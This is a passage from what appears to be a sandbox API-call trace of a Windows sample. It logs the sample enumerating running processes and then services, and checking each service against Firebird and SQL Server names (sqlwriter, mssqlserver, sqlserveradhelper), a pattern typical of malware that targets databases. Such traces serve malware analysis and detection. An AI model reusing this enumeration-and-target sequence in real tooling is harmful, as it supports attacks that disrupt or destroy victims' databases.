th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0031.764] lstrlenW (lpString="audiodg.exe") returned 11 [0031.764] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.765] lstrlenW (lpString="svchost.exe") returned 11 [0031.765] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.765] lstrlenW (lpString="svchost.exe") returned 11 [0031.766] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0031.766] lstrlenW (lpString="dwm.exe") returned 7 [0031.766] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0031.767] lstrlenW (lpString="explorer.exe") returned 12 [0031.767] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0031.767] lstrlenW (lpString="spoolsv.exe") returned 11 [0031.767] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.768] lstrlenW (lpString="taskhost.exe") returned 12 [0031.768] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.768] lstrlenW (lpString="svchost.exe") returned 11 [0031.769] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0031.769] lstrlenW (lpString="taskeng.exe") returned 11 [0031.769] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.770] lstrlenW (lpString="taskhost.exe") returned 12 [0031.770] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0031.770] lstrlenW (lpString="entrepreneur.exe") returned 16 [0031.770] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0031.771] lstrlenW (lpString="andrew kinds.exe") returned 16 [0031.771] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0031.771] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0031.771] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0031.772] lstrlenW (lpString="educated.exe") returned 12 [0031.772] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0031.773] lstrlenW (lpString="servers.exe") returned 11 [0031.773] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0031.842] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0031.842] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0031.842] lstrlenW (lpString="gbp_chair.exe") returned 13 [0031.842] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0031.843] lstrlenW (lpString="attention infected.exe") returned 22 [0031.843] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0031.844] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0031.844] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0031.844] lstrlenW (lpString="pattern amateur.exe") returned 19 [0031.844] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0031.845] lstrlenW (lpString="referral.exe") returned 12 [0031.845] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0031.845] lstrlenW (lpString="copyingseems.exe") returned 16 [0031.845] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0031.846] lstrlenW (lpString="spin generally.exe") returned 18 [0031.846] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0031.847] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0031.847] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0031.847] lstrlenW (lpString="transmit.exe") returned 12 [0031.847] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0031.848] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0031.848] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0031.848] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0031.848] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0031.849] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0031.849] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0031.850] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0031.850] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0031.850] lstrlenW (lpString="delight.exe") returned 11 [0031.850] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0031.851] lstrlenW (lpString="within enquiry.exe") returned 18 [0031.851] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0031.851] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0031.851] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.852] lstrlenW (lpString="dllhost.exe") returned 11 [0031.852] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.853] lstrlenW (lpString="dllhost.exe") returned 11 [0031.853] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0031.853] lstrlenW (lpString="agent1c.exe") returned 11 [0031.853] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0031.855] lstrlenW (lpString="cmd.exe") returned 7 [0031.855] Process32NextW (in: hSnapshot=0x118, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0031.855] CloseHandle (hObject=0x118) returned 1 [0031.855] Sleep (dwMilliseconds=0x1f4) [0033.002] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720420 [0033.003] EnumServicesStatusExW (in: hSCManager=0x3720420, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0033.004] GetLastError () returned 0xea [0033.004] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11e4) returned 0x6e5120 [0033.004] EnumServicesStatusExW (in: hSCManager=0x3720420, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6e5120, cbBufSize=0x11e4, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6e5120, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0033.005] CloseServiceHandle (hSCObject=0x3720420) returned 1 [0033.005] lstrlenW (lpString="Appinfo") returned 7 [0033.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0033.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0033.005] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0033.005] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0033.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0033.005] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0033.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0033.005] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0033.005] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0033.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0033.005] lstrlenW (lpString="AudioSrv") returned 8 [0033.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0033.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0033.005] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0033.005] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0033.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0033.005] lstrlenW (lpString="BFE") returned 3 [0033.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0033.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0033.005] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0033.005] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0033.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0033.005] lstrlenW (lpString="CryptSvc") returned 8 [0033.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0033.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0033.006] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0033.006] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0033.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0033.006] lstrlenW (lpString="CscService") returned 10 [0033.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0033.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0033.006] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0033.006] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0033.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0033.006] lstrlenW (lpString="DcomLaunch") returned 10 [0033.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.006] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0033.006] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0033.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0033.006] lstrlenW (lpString="Dhcp") returned 4 [0033.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0033.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0033.006] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0033.006] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0033.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0033.006] lstrlenW (lpString="Dnscache") returned 8 [0033.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0033.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0033.006] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0033.006] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0033.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0033.006] lstrlenW (lpString="DPS") returned 3 [0033.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0033.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0033.006] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0033.006] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0033.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0033.007] lstrlenW (lpString="eventlog") returned 8 [0033.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0033.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0033.007] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0033.007] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0033.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0033.007] lstrlenW (lpString="EventSystem") returned 11 [0033.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0033.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0033.007] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0033.007] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0033.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0033.007] lstrlenW (lpString="gpsvc") returned 5 [0033.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0033.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0033.007] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0033.007] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0033.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0033.007] lstrlenW (lpString="iphlpsvc") returned 8 [0033.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.007] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0033.007] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0033.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0033.007] lstrlenW (lpString="LanmanServer") returned 12 [0033.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0033.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0033.007] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0033.007] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0033.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0033.007] lstrlenW (lpString="LanmanWorkstation") returned 17 [0033.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.009] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0033.009] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0033.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0033.009] lstrlenW (lpString="lmhosts") returned 7 [0033.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0033.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0033.010] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0033.010] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0033.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0033.010] lstrlenW (lpString="MMCSS") returned 5 [0033.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0033.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0033.010] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0033.010] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0033.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0033.010] lstrlenW (lpString="MpsSvc") returned 6 [0033.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0033.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0033.010] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0033.010] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0033.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0033.010] lstrlenW (lpString="Netman") returned 6 [0033.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0033.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0033.010] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0033.010] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0033.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0033.010] lstrlenW (lpString="netprofm") returned 8 [0033.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0033.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0033.010] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0033.010] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0033.010] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0033.010] lstrlenW (lpString="NlaSvc") returned 6 [0033.010] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0033.010] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0033.010] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0033.011] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0033.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0033.011] lstrlenW (lpString="nsi") returned 3 [0033.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0033.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0033.011] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0033.011] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0033.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0033.011] lstrlenW (lpString="PcaSvc") returned 6 [0033.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0033.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0033.011] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0033.011] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0033.011] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0033.011] lstrlenW (lpString="PlugPlay") returned 8 [0033.011] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0033.011] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0033.011] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0033.011] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0033.011] lstrcmpiW 